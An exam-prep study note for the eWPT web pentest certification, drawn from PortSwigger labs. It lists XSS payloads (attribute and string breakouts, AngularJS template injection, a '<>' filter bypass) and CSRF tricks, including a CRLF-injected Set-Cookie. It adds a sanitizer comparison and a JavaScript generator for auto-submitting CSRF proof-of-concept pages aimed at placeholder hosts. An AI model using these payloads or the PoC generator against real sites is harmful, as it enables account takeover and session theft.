This note was written during 3 days of preparation for the eWPT and is 100% based on the PortSwigger labs.
General Note :
- According to the eLearnSecurity eWPT forums, the mods have said that every vulnerability present in scope must be documented in your report in order to pass.
- When you begin the eWPT exam, you are given a letter that states the scope and rules of engagement and explicitly spells out the "most severe part" that must be found to pass the exam.
Payload :
- Auto-submit the first form on the page (CSRF PoC trigger):
<script>document.forms[0].submit();</script>
- Set a cookie through CRLF injection in a vulnerable parameter (%0d%0a = CRLF), then submit the form once the bogus image errors out (CSRF token tied to a non-session cookie):
<img src="https://assets/?param=eneriiiiiiiiiii%0d%0aSet-Cookie:%20csrfKey=dTh9cPDHRGETeDxLixbxyhgzuQFEiuEG%3b%20SameSite=None" onerror="document.forms[0].submit()">
- Leverage an open redirect into XSS: when the redirect URL ends up in an href/location sink, a javascript: URL executes instead of redirecting:
javascript:alert('ener1')
- When "<" and ">" are blacklisted and your input lands inside a JavaScript string literal, break out of the string instead of injecting a tag:
'-alert('eneriiiiiiiiiiiiiiiiiiiiiiiiiiii')-'
- Break out of an img (or any) attribute with a quote, then add a tag carrying an event handler such as onload/onmouseover:
"><svg onload=alert('eneriiiiiiiiiiiiiiiii')>
- Close a select element first (tags inside <select>/<option> are not parsed as markup until the select is closed), then inject:
eneriiiiiiiiiiiiii"> </select> Inject_payload
- Simple AngularJS template-injection payloads (input rendered inside an ng-app scope is evaluated as an expression):
{{$on.constructor('alert("eneriiiiiiiiiiiiii")')()}}
{{$eval.constructor('alert("eneriiiiiiiiiiiiiiiiiii")')()}}
- Bypass a filter that only encodes the first "<" and ">" (e.g. String.replace() with a string pattern rather than a global regex) by prefixing a throwaway "<>":
<><img src=y0 onerror=alert('eneriiiiiiiiiiiiiiiiii')>
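Why the "<>" prefix works, as an added example (not code from the original note or from PortSwigger): the vulnerable sanitizer below mirrors the non-global String.replace() pattern the payload targets, the hardened one encodes every occurrence. The payload string and the tag check are constructed for this demo.

```javascript
// Added example: first-occurrence-only encoding versus global encoding.
// String.prototype.replace with a STRING pattern replaces only the first match,
// so one stray "<>" at the front absorbs the encoding and the real tag survives.

// Vulnerable sanitizer (the pattern the "<>" payload bypasses).
function sanitizeFirstOnly(input) {
  return input.replace('<', '&lt;').replace('>', '&gt;');
}

// Hardened sanitizer: global regexes, and the other characters that matter
// in HTML text and attribute contexts.
function sanitizeAll(input) {
  return input
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Crude check used for the demo: is there still something a browser
// would parse as a start tag?
function containsTag(html) {
  return /<[a-z][^>]*>/i.test(html);
}

// Payload from the note (constructed test input).
const PAYLOAD = "<><img src=y0 onerror=alert('ener')>";

// Returns both sanitizer outputs for the same payload.
function demo(payload = PAYLOAD) {
  return {
    firstOnly: sanitizeFirstOnly(payload),   // "&lt;&gt;<img src=y0 onerror=alert('ener')>"
    all: sanitizeAll(payload),               // no "<" left at all
  };
}

module.exports = { sanitizeFirstOnly, sanitizeAll, containsTag, demo };
```

Without the "<>" prefix, a plain `<img ...>` loses both its angle brackets to the vulnerable sanitizer, which is exactly why the throwaway pair is needed.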
XSS :
- Always read the site's .js files: client-side code often implements the XSS filter/sanitizer and reveals the sources and sinks.
- Always check hidden parameters (hidden inputs, data attributes and parameters only used by JavaScript).
- Spray tags and event handlers to discover which tags/words the web app blacklists or whitelists.
- Always check the HttpOnly flag on the session cookie in the Set-Cookie header; without it an XSS payload can read the cookie via document.cookie.
CSRF :
- Switch the HTTP method (POST to GET) to check whether CSRF protection is skipped for GET.
- Try removing the CSRF token parameter entirely.
- Try a CSRF token issued to another account: with both accounts logged in, generate a token in the attacker's session and drop that request so the token is not consumed, then use it in the victim's request.
- Use another account's CSRF cookie together with its CSRF token (token tied to a non-session cookie).
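The CSRF payloads above are fragments of a full PoC page. Below is an added example (not from the original note or PortSwigger) that generates that page: a hidden-field form that auto-submits, or, for the token-tied-to-cookie case, an <img> that first triggers the CRLF-injected Set-Cookie and then submits on error. The target URL, parameter names and cookie value are placeholders chosen for illustration; the Secure attribute is added over the note's payload because Chromium rejects SameSite=None cookies without it.

```javascript
// Added example: build a CSRF PoC page from the payload fragments in the note.

// Entity-encode a value for use inside a double-quoted HTML attribute.
function htmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// URL that plants a cookie through a CRLF-injectable parameter.
// `base`      : endpoint that reflects `vulnParam` into a response header (placeholder)
// The default attributes are SameSite=None (needed so the cookie is sent on the
// cross-site POST) plus Secure (required by Chromium for SameSite=None).
function cookieInjectionUrl(base, vulnParam, cookieName, cookieValue,
                            attrs = 'SameSite=None; Secure') {
  const injected = `x\r\nSet-Cookie: ${cookieName}=${cookieValue}; ${attrs}`;
  return `${base}?${vulnParam}=${encodeURIComponent(injected)}`;
}

// Self-submitting form. With opts.setCookieUrl the submit is deferred to the
// <img onerror> handler, so the cookie-setting response has arrived before
// the forged request fires.
function buildCsrfPoc(action, fields, opts = {}) {
  const method = opts.method || 'POST';
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `    <input type="hidden" name="${htmlAttr(name)}" value="${htmlAttr(value)}">`)
    .join('\n');
  const trigger = opts.setCookieUrl
    ? `  <img src="${htmlAttr(opts.setCookieUrl)}" onerror="document.forms[0].submit()">`
    : '  <script>document.forms[0].submit();</script>';
  return [
    '<html><body>',
    `  <form action="${htmlAttr(action)}" method="${htmlAttr(method)}">`,
    inputs,
    '  </form>',
    trigger,
    '</body></html>',
  ].join('\n');
}

// Usage with placeholder values (constructed):
const url = cookieInjectionUrl('https://target.example/search', 'search', 'csrfKey', 'abc123');
const poc = buildCsrfPoc('https://target.example/my-account/change-email',
  { email: 'attacker@evil.example', csrf: 'TOKEN-FROM-ATTACKER-SESSION' },
  { setCookieUrl: url });
console.log(poc);

module.exports = { htmlAttr, cookieInjectionUrl, buildCsrfPoc };
```

Host the generated HTML on the exploit server and deliver it to the victim; for the plain token-removal or token-swap tests just leave out setCookieUrl and adjust the csrf field.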
Credit Photo : @Opal_00_58 (https://twitter.com/Opal_00_58/status/1661318640006995969/photo/1)